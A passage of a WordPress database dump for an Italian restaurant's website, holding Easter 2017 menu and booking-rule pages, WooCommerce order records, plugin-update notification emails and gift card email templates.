può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\r\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\n<h2>Prenotazione Pasqua</h2>\r\n[product_category category=\"pasquetta\" number=\"8\"]\r\n\r\n<h2>Prenotazione Pasquetta</h2>\r\n[product_category category=\"pasquetta\" number=\"8\"]','Menù Pasqua e Pasquetta 2017','','inherit','closed','closed','','330-revision-v1','','','2017-03-22 21:05:27','2017-03-22 20:05:27','',330,'http://www.ristorantesolymar.it/2017/03/22/330-revision-v1/',0,'revision','',0),(341,1,'2017-03-22 23:56:48','2017-03-22 22:56:48','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/03/easter.jpeg\" alt=\"\" width=\"284\" height=\"177\" class=\"alignright size-full wp-image-336\" /><em>Oh, i bei rami d’ulivo! chi ne vuole?\r\nSon benedetti, li ha baciati il sole.\r\nIn queste foglioline tenerelle\r\nvi sono scritte tante cose belle.\r\nSull’uscio, alla finestra, accanto al letto\r\nmetteteci l’ulivo benedetto!\r\nCome la luce e le stelle serene:\r\nun po’ di pace ci fa tanto bene.</em>\r\n\r\n<h2>Menù di Pasqua</h2>\r\n<em>Tataky di palamita con caramello alla soia e topinambur\r\nInsalatina di granciporro con guacamole all\'arancio e cocco\r\nClub sandwich di sgombro , mucchino di Sanpatrignano e zucchine grigliate\r\nLinguine del pastificio mancini al bianco di ombrina, capperi, limone e pistacchio\r\nMerluzzo in tempura con insalatina di puntarelle con alici del cantabrico e bufala\r\nVariazione di cioccolato\r\n50€ a persona escluse bevande</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta, da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<h2>Menù di Pasquetta</h2>\r\nIl pranzo di pasquetta è alla carta\r\n\r\n\r\n<h3>Regolamento</h3>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze. La prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 14 aprile(per la prenotazione di domenica)ed entro le 12,00 di sabato 15 aprile (per la prenotazione di lunedì) solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata verrà trattenuta in caso di no show.Nel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show\r\nLa ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\n<h2>Prenotazione Pasqua</h2>\r\n[product_category category=\"pasqua\" number=\"10\"]\r\n\r\n<h2>Prenotazione Pasquetta</h2>\r\n[product_category category=\"pasquetta\" number=\"10\"]','Menù Pasqua e Pasquetta 2017','','inherit','closed','closed','','330-revision-v1','','','2017-03-22 23:56:48','2017-03-22 22:56:48','',330,'http://www.ristorantesolymar.it/2017/03/22/330-revision-v1/',0,'revision','',0),(342,1,'2017-03-23 18:29:44','2017-03-23 17:29:44','','Order &ndash; marzo 23, 2017 @ 06:29 PM','','wc-processing','open','closed','order_58d4053a59d8e','ordine-mar-23-2017-0526-pm','','','2017-03-23 18:29:44','2017-03-23 17:29:44','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=342',0,'shop_order','',3),(343,1,'2017-03-23 19:36:04','2017-03-23 18:36:04','','Order &ndash; marzo 23, 2017 @ 07:36 PM','','wc-processing','open','closed','order_58d4140fb4e72','ordine-mar-23-2017-0629-pm','','','2017-03-23 19:36:04','2017-03-23 18:36:04','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=343',0,'shop_order','',3),(344,1,'2017-03-24 10:43:33','2017-03-24 09:43:33','','Order &ndash; marzo 24, 2017 @ 10:43 AM','','wc-processing','open','closed','order_58d4ea0233391','ordine-mar-24-2017-0942-am','','','2017-03-24 10:43:33','2017-03-24 09:43:33','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=344',0,'shop_order','',3),(345,1,'2017-03-25 20:11:50','2017-03-25 19:11:50','','Order &ndash; marzo 25, 2017 @ 08:11 PM','','wc-processing','open','closed','order_58d6c09c043b0','ordine-mar-25-2017-0710-pm','','','2017-03-25 20:11:50','2017-03-25 19:11:50','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=345',0,'shop_order','',3),(346,1,'2017-03-25 21:07:55','2017-03-25 20:07:55','','Order &ndash; marzo 25, 2017 @ 09:07 PM','','wc-processing','open','closed','order_58d6cc8a1fae3','ordine-mar-25-2017-0801-pm','','','2017-03-25 21:07:55','2017-03-25 20:07:55','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=346',0,'shop_order','',3),(347,1,'2017-03-28 10:30:39','2017-03-28 08:30:39','','Order &ndash; marzo 28, 2017 @ 10:30 AM','','wc-processing','open','closed','order_58da1e9561b7a','ordine-mar-28-2017-0828-am','','','2017-03-28 10:30:39','2017-03-28 08:30:39','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=347',0,'shop_order','',3),(348,1,'2017-03-28 13:24:25','2017-03-28 11:24:25','','Order &ndash; marzo 28, 2017 @ 01:24 PM','','wc-processing','open','closed','order_58da47a9139f4','ordine-mar-28-2017-1123-am','','','2017-03-28 13:24:25','2017-03-28 11:24:25','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=348',0,'shop_order','',3),(349,1,'2017-03-29 22:35:40','2017-03-29 20:35:40','','Order &ndash; marzo 29, 2017 @ 10:35 PM','','wc-processing','open','closed','order_58dc19f6a6527','ordine-mar-29-2017-0832-pm','','','2017-03-29 22:35:40','2017-03-29 20:35:40','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=349',0,'shop_order','',3),(350,1,'2017-03-30 15:22:38','2017-03-30 13:22:38','','Order &ndash; marzo 30, 2017 @ 03:22 PM','','wc-processing','open','closed','order_58dd06109e08c','ordine-mar-30-2017-0120-pm','','','2017-03-30 15:22:38','2017-03-30 13:22:38','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=350',0,'shop_order','',3),(351,1,'2017-04-01 14:43:28','2017-04-01 12:43:28','','Order &ndash; aprile 1, 2017 @ 02:43 PM','','wc-processing','open','closed','order_58df9616188dd','ordine-apr-01-2017-1159-am','','','2017-04-01 14:43:28','2017-04-01 12:43:28','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=351',0,'shop_order','',3),(352,1,'2017-04-01 18:03:47','2017-04-01 16:03:47','','Order &ndash; aprile 1, 2017 @ 06:03 PM','','wc-cancelled','open','closed','order_58dfc7338ff50','ordine-apr-01-2017-0328-pm','','','2017-04-01 18:03:47','2017-04-01 16:03:47','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=352',0,'shop_order','',1),(353,1,'2017-04-01 18:24:04','2017-04-01 16:24:04','','Order &ndash; aprile 1, 2017 @ 06:24 PM','','wc-processing','open','closed','order_58dfd383f1385','ordine-apr-01-2017-0421-pm','','','2017-04-01 18:24:04','2017-04-01 16:24:04','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=353',0,'shop_order','',3),(354,1,'2017-04-02 10:31:23','2017-04-02 08:31:23','','Order &ndash; aprile 2, 2017 @ 10:31 AM','','wc-processing','open','closed','order_58e0b6b1b2c99','ordine-apr-02-2017-0830-am','','','2017-04-02 10:31:23','2017-04-02 08:31:23','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=354',0,'shop_order','',3),(355,1,'2017-04-02 17:34:46','2017-04-02 15:34:46','','Order &ndash; aprile 2, 2017 @ 05:34 PM','','wc-processing','open','closed','order_58e11988db869','ordine-apr-02-2017-0332-pm','','','2017-04-02 17:34:46','2017-04-02 15:34:46','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=355',0,'shop_order','',3),(357,1,'2017-04-04 09:37:12','2017-04-04 07:37:12','','Order &ndash; aprile 4, 2017 @ 09:37 AM','','wc-processing','open','closed','order_58e34ce8aacf0','ordine-apr-04-2017-0736-am','','','2017-04-04 09:37:12','2017-04-04 07:37:12','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=357',0,'shop_order','',3),(358,1,'2017-04-04 20:24:38','2017-04-04 18:24:38','','Order &ndash; aprile 4, 2017 @ 08:24 PM','','wc-cancelled','open','closed','order_58e3e44136acf','ordine-apr-04-2017-0621-pm','','','2017-04-04 20:24:38','2017-04-04 18:24:38','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=358',0,'shop_order','',1),(359,1,'2017-04-04 20:29:21','2017-04-04 18:29:21','','Order &ndash; aprile 4, 2017 @ 08:29 PM','','wc-processing','open','closed','order_58e3e5c8050fd','ordine-apr-04-2017-0628-pm','','','2017-04-04 20:29:21','2017-04-04 18:29:21','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=359',0,'shop_order','',3),(360,1,'2017-04-05 12:58:51','2017-04-05 10:58:51','','Order &ndash; aprile 5, 2017 @ 12:58 PM','','wc-processing','open','closed','order_58e4cce7b65fd','ordine-apr-05-2017-1054-am','','','2017-04-05 12:58:51','2017-04-05 10:58:51','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=360',0,'shop_order','',3),(361,1,'2017-04-06 09:38:13','2017-04-06 07:38:13','','Order &ndash; aprile 6, 2017 @ 09:38 AM','','wc-processing','open','closed','order_58e5efb0c2954','ordine-apr-06-2017-0735-am','','','2017-04-06 09:38:13','2017-04-06 07:38:13','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=361',0,'shop_order','',3),(362,1,'2017-04-06 15:32:57','2017-04-06 13:32:57','','Order &ndash; aprile 6, 2017 @ 03:32 PM','','wc-processing','open','closed','order_58e642be82732','ordine-apr-06-2017-0129-pm','','','2017-04-06 15:32:57','2017-04-06 13:32:57','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=362',0,'shop_order','',3),(363,1,'2017-04-07 22:30:15','2017-04-07 20:30:15','','Order &ndash; aprile 7, 2017 @ 10:30 PM','','wc-processing','open','closed','order_58e7f6a07798c','ordine-apr-07-2017-0829-pm','','','2017-04-07 22:30:15','2017-04-07 20:30:15','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=363',0,'shop_order','',3),(364,1,'2017-04-09 11:53:34','2017-04-09 09:53:34','','Order &ndash; aprile 9, 2017 @ 11:53 AM','','wc-processing','open','closed','order_58ea03fa44e8e','ordine-apr-09-2017-0950-am','','','2017-04-09 11:53:34','2017-04-09 09:53:34','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=364',0,'shop_order','',3),(365,1,'2017-04-09 12:17:04','2017-04-09 10:17:04','','Order &ndash; aprile 9, 2017 @ 12:17 PM','','wc-processing','open','closed','order_58ea09f8a45c1','ordine-apr-09-2017-1016-am','','','2017-04-09 12:17:04','2017-04-09 10:17:04','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=365',0,'shop_order','',3),(366,1,'2017-04-11 12:22:31','2017-04-11 10:22:31','','Order &ndash; aprile 11, 2017 @ 12:22 PM','','wc-processing','open','closed','order_58ecae39bd357','ordine-apr-11-2017-1021-am','','','2017-04-11 12:22:31','2017-04-11 10:22:31','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=366',0,'shop_order','',3),(367,1,'2017-04-11 15:13:14','2017-04-11 13:13:14','','Order &ndash; aprile 11, 2017 @ 03:13 PM','','wc-cancelled','open','closed','order_58ecca1f0a8d1','ordine-apr-11-2017-1220-pm','','','2017-04-11 15:13:14','2017-04-11 13:13:14','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=367',0,'shop_order','',1),(368,1,'2017-04-11 14:57:25','2017-04-11 12:57:25','','Order &ndash; aprile 11, 2017 @ 02:57 PM','','wc-processing','open','closed','order_58ecd2643ecbb','ordine-apr-11-2017-1256-pm','','','2017-04-11 14:57:25','2017-04-11 12:57:25','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=368',0,'shop_order','',3),(369,1,'2017-04-11 15:51:23','2017-04-11 13:51:23','','Order &ndash; aprile 11, 2017 @ 03:51 PM','','wc-processing','open','closed','order_58ecdea042cbf','ordine-apr-11-2017-0148-pm','','','2017-04-11 15:51:23','2017-04-11 13:51:23','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=369',0,'shop_order','',3),(370,1,'2017-04-11 16:01:46','2017-04-11 14:01:46','','Order &ndash; aprile 11, 2017 @ 04:01 PM','','wc-processing','open','closed','order_58ece10caf781','ordine-apr-11-2017-0158-pm','','','2017-04-11 16:01:46','2017-04-11 14:01:46','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=370',0,'shop_order','',3),(371,1,'2017-04-11 19:08:17','2017-04-11 17:08:17','','Order &ndash; aprile 11, 2017 @ 07:08 PM','','wc-processing','open','closed','order_58ed0d555dbe0','ordine-apr-11-2017-0507-pm','','','2017-04-11 19:08:17','2017-04-11 17:08:17','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=371',0,'shop_order','',3),(372,1,'2017-04-12 14:17:05','2017-04-12 12:17:05','','Order &ndash; aprile 12, 2017 @ 02:17 PM','','wc-processing','open','closed','order_58ee1993ce3bb','ordine-apr-12-2017-1212-pm','','','2017-04-12 14:17:05','2017-04-12 12:17:05','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=372',0,'shop_order','',3),(373,1,'2017-04-12 16:05:50','2017-04-12 14:05:50','','Order &ndash; aprile 12, 2017 @ 04:05 PM','','wc-cancelled','open','closed','order_58ee29324f3b5','ordine-apr-12-2017-0118-pm','','','2017-04-12 16:05:50','2017-04-12 14:05:50','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=373',0,'shop_order','',1),(374,1,'2017-04-12 20:12:23','2017-04-12 18:12:23','','Order &ndash; aprile 12, 2017 @ 08:12 PM','','wc-processing','open','closed','order_58ee6d25b8320','ordine-apr-12-2017-0608-pm','','','2017-04-12 20:12:23','2017-04-12 18:12:23','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=374',0,'shop_order','',3),(375,1,'2017-04-13 10:05:43','2017-04-13 08:05:43','','Order &ndash; aprile 13, 2017 @ 10:05 AM','','wc-processing','open','closed','order_58ef305973ea0','ordine-apr-13-2017-0801-am','','','2017-04-13 10:05:43','2017-04-13 08:05:43','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=375',0,'shop_order','',3),(376,1,'2017-04-13 13:26:44','2017-04-13 11:26:44','','Order &ndash; aprile 13, 2017 @ 01:26 PM','','wc-cancelled','open','closed','order_58ef56e77917c','ordine-apr-13-2017-1045-am','','','2017-04-13 13:26:44','2017-04-13 11:26:44','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=376',0,'shop_order','',1),(377,1,'2017-04-13 13:39:53','2017-04-13 11:39:53','','Order &ndash; aprile 13, 2017 @ 01:39 PM','','wc-processing','open','closed','order_58ef6297bbf1a','ordine-apr-13-2017-1135-am','','','2017-04-13 13:39:53','2017-04-13 11:39:53','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=377',0,'shop_order','',3),(378,1,'2017-04-13 14:09:04','2017-04-13 12:09:04','','Order &ndash; aprile 13, 2017 @ 02:09 PM','','wc-processing','open','closed','order_58ef693fcadb4','ordine-apr-13-2017-1204-pm','','','2017-04-13 14:09:04','2017-04-13 12:09:04','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=378',0,'shop_order','',3),(379,1,'2017-04-13 14:11:43','2017-04-13 12:11:43','','Order &ndash; aprile 13, 2017 @ 02:11 PM','','wc-processing','open','closed','order_58ef69ee794b8','ordine-apr-13-2017-1207-pm','','','2017-04-13 14:11:43','2017-04-13 12:11:43','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=379',0,'shop_order','',3),(380,1,'2017-04-13 14:17:31','2017-04-13 12:17:31','','Order &ndash; aprile 13, 2017 @ 02:17 PM','','wc-processing','open','closed','order_58ef6a1e5573a','ordine-apr-13-2017-1207-pm-2','','','2017-04-13 14:17:31','2017-04-13 12:17:31','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=380',0,'shop_order','',3),(381,1,'2017-04-13 15:10:59','2017-04-13 13:10:59','','Order &ndash; aprile 13, 2017 @ 03:10 PM','','wc-processing','open','closed','order_58ef7886def31','ordine-apr-13-2017-0109-pm','','','2017-04-13 15:10:59','2017-04-13 13:10:59','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=381',0,'shop_order','',3),(382,1,'2017-04-14 10:53:12','2017-04-14 08:53:12','','Order &ndash; aprile 14, 2017 @ 10:53 AM','','wc-processing','open','closed','order_58f08dd1a23e4','ordine-apr-14-2017-0852-am','','','2017-04-14 10:53:12','2017-04-14 08:53:12','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=382',0,'shop_order','',3),(383,1,'2017-04-14 11:17:46','2017-04-14 09:17:46','','Order &ndash; aprile 14, 2017 @ 11:17 AM','','wc-processing','open','closed','order_58f0903dd1f59','ordine-apr-14-2017-0902-am','','','2017-04-14 11:17:46','2017-04-14 09:17:46','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=383',0,'shop_order','',3),(384,1,'2017-04-14 14:17:07','2017-04-14 12:17:07','','Order &ndash; aprile 14, 2017 @ 02:17 PM','','wc-processing','open','closed','order_58f0bc62cb33d','ordine-apr-14-2017-1211-pm','','','2017-04-14 14:17:07','2017-04-14 12:17:07','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=384',0,'shop_order','',3),(385,1,'2017-04-14 19:35:51','2017-04-14 17:35:51','','Order &ndash; aprile 14, 2017 @ 07:35 PM','','wc-processing','open','closed','order_58f107a66b666','ordine-apr-14-2017-0532-pm','','','2017-04-14 19:35:51','2017-04-14 17:35:51','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=385',0,'shop_order','',3),(386,1,'2017-04-14 21:36:46','2017-04-14 19:36:46','','Order &ndash; aprile 14, 2017 @ 09:36 PM','','wc-processing','open','closed','order_58f123e5706b8','ordine-apr-14-2017-0732-pm','','','2017-04-14 21:36:46','2017-04-14 19:36:46','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=386',0,'shop_order','',3),(387,1,'2017-04-15 11:13:12','2017-04-15 09:13:12','','Order &ndash; aprile 15, 2017 @ 11:13 AM','','wc-processing','open','closed','order_58f1e38550941','ordine-apr-15-2017-0910-am','','','2017-04-15 11:13:12','2017-04-15 09:13:12','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=387',0,'shop_order','',3),(391,1,'2017-07-06 23:41:09','2017-07-06 21:41:09','','home [ID: 3da746594v]','','publish','closed','closed','','home','','','2017-07-06 23:41:09','2017-07-06 21:41:09','',0,'http://www.ristorantesolymar.it/pt_view/home/',0,'pt_view','',0),(3710,0,'2021-01-13 01:22:59','2021-01-13 00:22:59','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO (from version 15.6 to 15.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-27','','','2021-01-13 01:22:59','2021-01-13 00:22:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-27/',0,'postman_sent_mail','',0),(3709,0,'2021-01-13 01:22:59','2021-01-13 00:22:59','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO (from version 15.6 to 15.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-26','','','2021-01-13 01:22:59','2021-01-13 00:22:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-26/',0,'postman_sent_mail','',0),(395,1,'2017-07-06 23:39:50','2017-07-06 21:39:50','','Shop','','inherit','closed','closed','','207-revision-v1','','','2017-07-06 23:39:50','2017-07-06 21:39:50','',207,'http://www.ristorantesolymar.it/2017/07/06/207-revision-v1/',0,'revision','',0),(3699,0,'2021-01-06 01:23:01','2021-01-06 00:23:01','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.45 to 1.16.46)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-19','','','2021-01-06 01:23:01','2021-01-06 00:23:01','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-19/',0,'postman_sent_mail','',0),(399,1,'2017-07-10 21:32:44','2017-07-10 19:32:44',' <center style=\"width: 100%;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"><tr> <td style=\"padding: 20px 10px; text-align: left\">[LOGO] </td><td style=\"padding: 20px 10; text-align: right\"><span style=\"font-size: 35px; font-family: arial; font-weight: bold; display: block;\">[AMOUNT]</span><span style=\"font-size: 16px; font-family: arial; font-weight: bold; display: block;\">(Ed: [EXPIRYDATE])</span> </td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"> <tr><td align=\"center\" style=\"padding: 40px 0px;\"> <span style=\"font-size: 25px; font-family: \"Roboto,Ubuntu,\"Helvetica Neue\",sans-serif\"; font-weight: bold;\">Coupon Code</span> <p style=\"background-color: #e91e63; color: #fff; padding: 10px 10px; font-size: 26px; font-family: arial; margin: 10px 0px 10px 0px; letter-spacing: 10px; word-wrap: break-word; word-break: break-all;\">[COUPON]</p></td></tr><tr> <td align=\"center\" valign=\"top\" style=\"padding: 10px;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td style=\"padding: 10px; text-align: center\"> [DEFAULTEVENT] </td></tr><tr> <td style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\" class=\"center-on-narrow\"> </td></tr></table> </td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\"> <table width=\"100%\" role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td style=\"padding: 10px;\"> <p style=\"min-height: 190px;\">[MESSAGE]</p></td></tr><tr> <td style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\" class=\"center-on-narrow\"><p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width:22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">From :</span><span style=\"width:75%; float: left; word-wrap: break-word; word-break: break-all;\">[FROM]</span></p><p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width:22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">To :</span><span style=\"width:75%; float: left; word-wrap: break-word; word-break: break-all;\">[TO]</span></p></td></tr></table> </td></tr></table> </td></tr></table> <table bgcolor=\"#333333\" role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"> <tr> <td bgcolor=\"#333333\" style=\"padding: 10px 10px;width: 100%;font-size: 14px; font-weight: bold; font-family: sans-serif; mso-height-rule: exactly; line-height:18px; text-align: center; color: #ffffff;\"> [DISCLAIMER] </td></tr></table> </center><style type=\"text/css\">@media screen and (max-width: 480px){.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}.stack-column-center{text-align: center !important;}}</style>','Template1','','publish','closed','closed','','template1','','','2017-07-10 21:32:44','2017-07-10 19:32:44','',0,'http://www.ristorantesolymar.it/2017/07/10/template1/',0,'giftcard','',0),(400,1,'2017-07-10 21:32:44','2017-07-10 19:32:44',' <center style=\"width: 100%;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"><tr> <td style=\"padding: 20px 10px; text-align: left\">[LOGO] </td><td style=\"padding: 20px 10; text-align: right\"><span style=\"font-size: 35px; font-family: arial; font-weight: bold; display: block;\">[AMOUNT]</span><span style=\"font-size: 16px; font-family: arial; font-weight: bold; display: block;\">(Ed: [EXPIRYDATE])</span> </td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"> <tr><td align=\"center\" style=\"padding: 40px 0px;\"> <span style=\"font-size: 25px; font-family: \"Roboto,Ubuntu,\"Helvetica Neue\",sans-serif\"; font-weight: bold;\">Coupon Code</span> <p style=\"background-color: #e91e63; color: #fff; padding: 10px 10px; font-size: 26px; font-family: arial; margin: 10px 0px 10px 0px; letter-spacing: 10px; word-wrap: break-word; word-break: break-all;\">[COUPON]</p></td></tr><tr> <td align=\"center\" valign=\"top\" style=\"padding: 10px;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"stack-column-center\" style=\"vertical-align: top; top; width: 50%;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 10px;\"> <p style=\"min-height: 190px;\">[MESSAGE]</p></td></tr><tr> <td style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\" class=\"center-on-narrow\"><p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width:22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">From :</span><span style=\"width:75%; float: left; word-wrap: break-word; word-break: break-all;\">[FROM]</span></p><p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width:22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">To :</span><span style=\"width:75%; float: left; word-wrap: break-word; word-break: break-all;\">[TO]</span></p></td></tr></table> </td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td style=\"padding: 10px; text-align: center\"> [DEFAULTEVENT] </td></tr><tr> <td style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\" class=\"center-on-narrow\"> </td></tr></table> </td></tr></table> </td></tr></table> <table bgcolor=\"#333333\" role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto; width: 100%!important;\" class=\"email-container\"> <tr> <td bgcolor=\"#333333\" style=\"padding: 10px 10px;width: 100%;font-size: 14px; font-weight: bold; font-family: sans-serif; mso-height-rule: exactly; line-height:18px; text-align: center; color: #ffffff;\"> [DISCLAIMER] </td></tr></table> </center><style type=\"text/css\">@media screen and (max-width: 480px){.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}.stack-column-center{text-align: center !important;}}</style>','Template2','','publish','closed','closed','','template2','','','2017-07-10 21:32:44','2017-07-10 19:32:44','',0,'http://www.ristorantesolymar.it/2017/07/10/template2/',0,'giftcard','',0),(401,1,'2017-07-10 21:32:44','2017-07-10 19:32:44','&nbsp;\r\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" 